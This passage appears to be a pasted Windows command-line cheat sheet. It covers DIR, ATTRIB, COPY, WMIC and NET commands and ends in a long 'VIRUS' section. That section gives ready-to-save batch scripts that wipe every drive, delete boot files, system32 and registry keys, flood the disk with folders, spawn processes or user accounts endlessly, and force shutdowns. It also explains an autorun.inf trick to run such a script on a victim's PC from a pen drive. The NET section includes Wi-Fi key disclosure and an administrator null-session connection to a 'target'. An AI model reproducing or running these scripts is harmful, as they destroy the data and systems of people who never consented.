  1149. [CD] CHDIR [/D] [drive:][path]
  1150. [CD] CHDIR [..]
  1151. [CD] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-=-CD END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1152. [CLIP] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CLIP-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1153. [CLIP] CLIP /?
  1154. [CLIP] command | clip
  1155. [CLIP] DIR | CLIP
  1156. [CLIP] CLIP < README.TXT
  1157. [CLIP] TYPE DIR /B > List.txt
  1158. [CLIP] CMD /R DIR /B > List.txt
  1159. [CLIP] DIR > List.txt
  1160. [CLIP] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-CLIP END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1161. [DIR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-DIR-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1162. [DIR] DIR /?
  1163. [DIR] DIR \*.* /S /B /A
  1164. [DIR] DIR /ad
  1165. [DIR] DIR /ash
  1166. [DIR] DIR /a-d
  1167. [DIR] DIR /a:d
  1168. [DIR] DIR /b
  1169. [DIR] DIR /-c
  1170. [DIR] DIR /D
  1171. [DIR] DIR /L
  1172. [DIR] DIR /-N
  1173. [DIR] DIR /OD
  1174. [DIR] DIR /O-D
  1175. [DIR] DIR /P
  1176. [DIR] DIR /Q
  1177. [DIR] DIR /R
  1178. [DIR] DIR /S
  1179. [DIR] DIR /TC
  1180. [DIR] DIR /W
  1181. [DIR] DIR /a:s
  1182. [DIR] DIR \*.mp3 /s
  1183. [DIR] DIR \*.mp3 /s /p
  1184. [DIR] DIR \*.mp3 /s /b > filename.txt
  1185. [DIR] DIR \*.txt /s /b /a |clip
  1186. [DIR] DIR *.txt
  1187. [DIR] DIR /B /S \Mmystuff > File.txt
  1188. [DIR] DIR /O:gne OR DIR /O:S OR DIR /O:D
  1189. [DIR] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-DIR END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1190. [ATTRIB] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-ATTRIB-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1191. [ATTRIB] ATTRIB +h %%0 Bat File hide
  1192. [ATTRIB] ATTRIB +S +H "E:\*" /S /D
  1193. [ATTRIB] ATTRIB -S -H -R /s /d *.*
  1194. [ATTRIB] ATTRIB -S -H -R /s /d G:\*.*
  1195. [ATTRIB] set /p Hide= Type File Only EXTENSION:,>ATTRIB +h +s *.%%Hide%%
  1196. [ATTRIB] set /p Unh= Type File Only EXTENSION:,>ATTRIB /S -h -s *.%%Unh%%
  1197. [ATTRIB] ATTRIB To hide all files and subfolders in your target location,
  1198. [ATTRIB] ATTRIB +h +S C:PathToTheFileOrFolder /s /d
  1199. [ATTRIB] ATTRIB -h c:\config.sys
  1200. [ATTRIB] ATTRIB -h -r -s c:\boot\bcd
  1201. [ATTRIB] ATTRIB +a f:*.* & attrib -a f:*.bak
  1202. [ATTRIB] ATTRIB myimage.jpg
  1203. [ATTRIB] ATTRIB Run command prompt as an administrator For Virus Remove
  1204. [ATTRIB] ATTRIB -r -a -h *.* or ATTRIB -s -h /s /d *.*
  1205. [ATTRIB] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-ATTRIB END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1206. [COPY] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COPY-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1207. [COPY] COPY *.txt D:\
  1208. [COPY] COPY *.* D: OR COPY * D:\Folder /y
  1209. [COPY] COPY sourceFile destinationFile OR XCOPY sourceFile destinationFile
  1210. [COPY] COPY c:\data\file1.doc D:\backup\file2.doc , Single Copy
  1211. [COPY] COPY c:\data\*.doc D:\backup , All Doc Files Data Folder Copy
  1212. [COPY] COPY /Y c:\dir1\file1.txt c:\dir2\file2.txt , Without confirmation
  1213. [COPY] To COPY all files in current folder to another folder
  1214. [COPY] COPY * D:\dir1\dir2
  1215. [COPY] COPY *.* D:
  1216. [COPY] COPY "computer hope.txt" hope
  1217. [COPY] COPY myfile1.txt+myfile2.txt , combines Files contents
  1218. [COPY] COPY /b Pic.jpg+Text.txt NewPic.jpg , Text Hide In Picture
  1219. [COPY] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COPY END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1220. [WMIC] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-WMIC-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1221. [WMIC] ~~~**** WMIC ALL COMMAND'S NOT WORK N.HTA***~~~
  1222. [WMIC] WMIC ComputerSystem GET Model
  1223. [WMIC] WMIC computersystem get name,systemtype
  1224. [WMIC] WMIC bios get serialnumber
  1225. [WMIC] WMIC csproduct get identifyingnumber
  1226. [WMIC] WMIC nic get macaddress,description
  1227. [WMIC] WMIC baseboard get product,Manufacturer,version,serialnumbe
  1228. [WMIC] WMIC COMPUTERSYSTEM get TotalPhysicalMemory
  1229. [WMIC] WMIC process get workingsetsize,commandline
  1230. [WMIC] WMIC partition get name,size,type
  1231. [WMIC] WMIC COMPUTERSYSTEM GET MANUFACTURER
  1232. [WMIC] WMIC csproduct get version
  1233. [WMIC] WMIC service list brief
  1234. [WMIC] WMIC process list brief
  1235. [WMIC] WMIC startup list brief
  1236. [WMIC] WMIC process where name="firefox.exe" call terminate
  1237. [WMIC] WMIC output to file get all process name Save
  1238. [WMIC] WMIC /output:"C:\output.txt"
  1239. [WMIC] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-WMIC END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1240. [NET] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-NET-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1241. [NET] Ping =xample, you can type in Command prompt ping 8.8.8.8 which belongs to Google.
  1242. [NET] nslookup = nslookup www.google.com
  1243. [NET] arp = You can try typing arp-a in command prompt.
  1244. [NET] ipconfig =You can type in command prompt “ipconfig” or “ipconfig /all“
  1245. [NET] ipconfig /release (this will release your IP)
  1246. [NET] ipconfig /renew (this will renew your iP)
  1247. [NET] netstat =Type in command prompt “netstat -a“ "netstat -n" "netstat -an"
  1248. [NET] Route =You can type in command prompt “route print“
  1249. [NET] Net View =You can type in command prompt “net view x.x.x.x or computername“
  1250. [NET] Net User =Net User "Enter" , Net User Najeeb "Enter"
  1251. [NET] Net User =net user yourusername * (Change yourusername with your PC user name and press Enter. Now type the new password.)
  1252. [NET] Net Use =net use \ipaddressipc$ “” /user:administrator (this command will allow you to connect to the target as administrator)
  1253. [NET] Net Use =net use K: \computernameC$ (this will create a virtual drive on your “my computer” folder)
  1254. [NET] Tasklist =taskkill /PID 1532 /F (if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F
  1255. [NET] iexplore = use iexplore <IP address> to find sites running on any particular IP address.
  1256. [NET] Pathping =
  1257. [NET] Getmac =
  1258. [NET] Netsh =
  1259. [NET] ftp = ftp 192.168.1.80
  1260. [NET] ssh = ssh Najeeb@192.168.0.100
  1261. [NET] Netstat =
  1262. [NET] tracert =tracert www.google.com
  1263. [NET] Net wlan show profile "Enter"
  1264. [NET] Net wlan show profile "wifi Name" key=clear "Enter"
  1265. [NET] Help =whatevercommand /help OR whatevercommand /?
  1266. [NET] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-NET END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1267. [VIRUS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-VIRUS-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1268. [VIRUS] EVERY VIRUS SAVE (NOTEPADE) SAVE.BAT
  1269. [VIRUS] C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  1270. [VIRUS] 1 Unlimited Folder flooded prank
  1271. [VIRUS] @echo off
  1272. [VIRUS] : x
  1273. [VIRUS] md %%random%%
  1274. [VIRUS] /folder.
  1275. [VIRUS] goto x
  1276. [VIRUS] 2 ---------------------------------
  1277. [VIRUS] This will create unlimited no.of folders In Drive
  1278. [VIRUS] @echo off
  1279. [VIRUS] :VIRUS
  1280. [VIRUS] cd /d C:
  1281. [VIRUS] md %%RANDOM%%
  1282. [VIRUS] cd /d D:
  1283. [VIRUS] md %%RANDOM%%
  1284. [VIRUS] cd /d E:
  1285. [VIRUS] md %%RANDOM%%
  1286. [VIRUS] goto VIRUS
  1287. [VIRUS] 3 --------------------------------
  1288. [VIRUS] DIRVE FILES AND FOLDER DELETE
  1289. [VIRUS] @echo off
  1290. [VIRUS] del D:\*.* /f /s /q
  1291. [VIRUS] del E:\*.* /f /s /q
  1292. [VIRUS] del F:\*.* /f /s /q
  1293. [VIRUS] del G:\*.* /f /s /q
  1294. [VIRUS] del H:\*.* /f /s /q
  1295. [VIRUS] del I:\*.* /f /s /q
  1296. [VIRUS] del J:\*.* /f /s /q
  1297. [VIRUS] 4 -------------------------------
  1298. [VIRUS] DIRVE DELETE
  1299. [VIRUS] rd/s/q C:\
  1300. [VIRUS] rd/s/q D:\
  1301. [VIRUS] rd/s/q E:\
  1302. [VIRUS] rd/s/q F:\
  1303. [VIRUS] 5 --------------------------------
  1304. [VIRUS] C WINDOWS DELETE
  1305. [VIRUS] @echo off
  1306. [VIRUS] attrib -r -s -h c:\autoexec.bat
  1307. [VIRUS] del c:\autoexec.bat
  1308. [VIRUS] attrib -r -s -h c:\boot.ini
  1309. [VIRUS] del c:\boot.ini
  1310. [VIRUS] attrib -r -s -h c:\ntldr
  1311. [VIRUS] del c:\ntldr
  1312. [VIRUS] attrib -r -s -h c:\windows\win.ini
  1313. [VIRUS] del c:\windows\win.ini
  1314. [VIRUS] 6 ---------------------------------
  1315. [VIRUS] Del c:\WINDOWS\system32\*.*/q
  1316. [VIRUS] 7 ---------------------------------
  1317. [VIRUS] WINDOWS REGISTRY DELETE
  1318. [VIRUS] @ECHO OFF
  1319. [VIRUS] START reg delete HKCR/.exe
  1320. [VIRUS] START reg delete HKCR/.dll
  1321. [VIRUS] START reg delete HKCR/*
  1322. [VIRUS] 8 --------------------------------
  1323. [VIRUS] Dangerous notepad virus
  1324. [VIRUS] Delete Registry Keys
  1325. [VIRUS] @ECHO OFF
  1326. [VIRUS] START reg delete HKCR/.exe
  1327. [VIRUS] START reg delete HKCR/.dll
  1328. [VIRUS] START reg delete HKCR/*
  1329. [VIRUS] :MESSAGE
  1330. [VIRUS] ECHO Your PC has been crashed.Your Dad.
  1331. [VIRUS] GOTO MESSAGE
  1332. [VIRUS] 9 --------------------------------
  1333. [VIRUS] NET CLOSE
  1334. [VIRUS] @Echo off
  1335. [VIRUS] Ipconfig /release
  1336. [VIRUS] 10 -------------------------------
  1337. [VIRUS] SHUTDOWN COMPUTER
  1338. [VIRUS] @echo off
  1339. [VIRUS] msg * Lets Roll Baby
  1340. [VIRUS] shutdown -c “Error” -s
  1341. [VIRUS] 11 -------------------------------
  1342. [VIRUS] SHUTDOWN COMPUTER
  1343. [VIRUS] shutdown -s -t 100 c “Installing Updates”
  1344. [VIRUS] 12 --------------------------------
  1345. [VIRUS] This Virus Deletes All The Content Of A Drive...
  1346. [VIRUS] @echo off
  1347. [VIRUS] del %%systemdrive%%*.* /f /s /q
  1348. [VIRUS] shutdown -r -f -t 00
  1349. [VIRUS] Save The Above Code As Anything.bat
  1350. [VIRUS] 13 --------------------------------
  1351. [VIRUS] Endless Notepad virus prank
  1352. [VIRUS] @ECHO off
  1353. [VIRUS] :top
  1354. [VIRUS] START %%SystemRoot%%\system32\notepad.exe
  1355. [VIRUS] GOTO top
  1356. [VIRUS] 14 ---------------------------------
  1357. [VIRUS] Notepad Matrix prank
  1358. [VIRUS] @echo off
  1359. [VIRUS] color 02
  1360. [VIRUS] :start
  1361. [VIRUS] echo %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%%
  1362. [VIRUS] goto start
  1363. [VIRUS] 15 --------------------------------
  1364. [VIRUS] SOFTWARE BOOM
  1365. [VIRUS] @echo off
  1366. [VIRUS] :x
  1367. [VIRUS] start winword
  1368. [VIRUS] start mspaint
  1369. [VIRUS] start notepad
  1370. [VIRUS] start write
  1371. [VIRUS] start cmd
  1372. [VIRUS] start explorer
  1373. [VIRUS] start control
  1374. [VIRUS] start calc
  1375. [VIRUS] goto x
  1376. [VIRUS] 16 ----------------------------------
  1377. [VIRUS] User Account Floders
  1378. [VIRUS] This will create large no. of the user account on one’s PC and goes on
  1379. [VIRUS] @echo off
  1380. [VIRUS] :xnet
  1381. [VIRUS] user %%random%% /add
  1382. [VIRUS] goto x
  1383. [VIRUS] 17 ----------------------------------
  1384. [VIRUS] Constantly Repeat Any Messages
  1385. [VIRUS] This is one of the Best Notepad tricks that will repeat any of the messages on the computer screen repeatedly. Just copy the below code and paste in the notepad and save it as “message.bat”.
  1386. [VIRUS] @ECHO off
  1387. [VIRUS] :Begin
  1388. [VIRUS] msg * Hi
  1389. [VIRUS] msg * Are you having fun?
  1390. [VIRUS] msg * I am
  1391. [VIRUS] msg * Lets have fun together
  1392. [VIRUS] msg * Because you have been o-w-n-e-d
  1393. [VIRUS] GOTO BEGIN
  1394. [VIRUS] 18 --------------------------------------
  1395. [VIRUS] Virus that crashes pc
  1396. [VIRUS] @echo off
  1397. [VIRUS] attrib -r -s -h c:autoexec.bat
  1398. [VIRUS] del c:autoexec.bat
  1399. [VIRUS] attrib -r -s -h c:boot.ini
  1400. [VIRUS] del c:boot.ini
  1401. [VIRUS] attrib -r -s -h c:ntldr
  1402. [VIRUS] del c:ntldr
  1403. [VIRUS] attrib -r -s -h c:windowswin.ini
  1404. [VIRUS] del c:windowswin.ini
  1405. [VIRUS] @echo off
  1406. [VIRUS] msg * YOU GOT OWNED
  1407. [VIRUS] shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
  1408. [VIRUS] Save As Anything.bat File In Notepad
  1409. [VIRUS] And Shut Down The Computer Never To Reboot Again
  1410. [VIRUS] 19 ---------------------------------
  1411. [VIRUS] Change Files To Non-working TXT Files
  1412. [VIRUS] Save As A bat File
  1413. [VIRUS] REN *.DOC *.TXT
  1414. [VIRUS] REN *.JPEG *.TXT
  1415. [VIRUS] REN *.LNK *.TXT
  1416. [VIRUS] REN *.AVI *.TXT
  1417. [VIRUS] REN *.MPEG *.TXT
  1418. [VIRUS] REN *.COM *.TXT
  1419. [VIRUS] REN *.BAT *.TXT
  1420. [VIRUS] Pause:
  1421. [VIRUS] 20 ---------------------------------------
  1422. [VIRUS] Open notepad and write
  1423. [VIRUS] [autorun]
  1424. [VIRUS] open=anything.bat
  1425. [VIRUS] Icon=anything.ico
  1426. [VIRUS] Save file as autorun.inf
  1427. [VIRUS] Step 2. Put this autorun.inf and your actual batch virus anything.bat in pendrive .
  1428. [VIRUS] When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
  1429. [VIRUS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-VIRUS END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement